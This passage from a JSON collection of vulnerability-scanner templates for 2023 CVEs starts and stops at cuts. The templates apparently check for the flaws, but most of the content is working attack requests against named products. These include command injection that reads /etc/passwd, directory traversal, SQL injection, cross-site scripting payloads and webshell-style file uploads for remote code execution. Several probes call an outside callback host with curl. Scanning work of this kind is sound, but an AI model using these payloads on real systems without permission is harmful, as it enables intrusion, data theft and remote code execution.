xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"evil.com"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://evil.com/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5('CVE-2023-2648');?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["747711c62dffae7dbf726d8241bd07fe"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2023-33440'); ?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"threads":30,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET 